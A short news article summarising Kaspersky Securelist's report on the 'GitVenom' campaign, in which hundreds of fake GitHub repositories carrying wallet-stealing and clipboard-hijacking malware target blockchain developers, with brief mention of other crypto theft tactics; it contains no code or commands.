- Hackers are using fake GitHub repositories to target blockchain developers
- The repositories appear legitimate hence increasing the chances of nabbing victims
- The repositories contain malicious code that allows the malicious actors to obtain a developer’s crypto wallet details
Crypto hackers are changing their tactics and are now targeting blockchain developers using fake GitHub repositories. According to Kaspersky’s Securelist, the repositories resemble genuine ones but contain malicious code that enable hackers to obtain a developer’s crypto wallet data and other details like their browsing history. Some repositories contain code that takes over a developer’s clipboard allowing the attacker to manipulate crypto addresses during the copy-pasting process, increasing the amount of funds stolen.
Hundreds of Fake GitHub Repositories Created
Securelist disclosed that the fake GitHub repositories are part of the “GitVenom campaign” that has seen threat actors create “hundreds of repositories on GitHub that contain fake projects with malicious code.”
One such project, for example, claims to be a Telegram bot that interacts with Bitcoin wallets but includes malware that drains a developer’s wallet. Securelist noted that the fake repositories “were written in multiple programming languages” including Python, C, C++, JavaScript, and C#.
According to Securelist, some projects in the GitVenom campaign were published two years ago with the researchers noting that “the infection vector is likely quite efficient.” They also said they expect threat actors to continue using fake repositories “possibly with small changes in” tactics, techniques, and procedures (TTPs).
The researchers advised developers to be careful when running third-party code since GitHub is used by millions of developers, making it hard to differentiate between genuine and malicious repositories.
Malicious Actors Expanding Their Methods
The fake GitHub repositories add to a growing list of methods used by malicious actors to steal crypto. In October last year, for example, North Korean hacking group Lazarus used a fake NFT game to drain the wallets of unsuspecting gamers.
Threat actors are also disguising themselves as uninformed crypto users and publicly sharing their wallets’ seed phrases to entice victims.
With hackers now going after crypto developers, the number of victims may increase since some developers may unknowingly use the corrupt code in their projects.
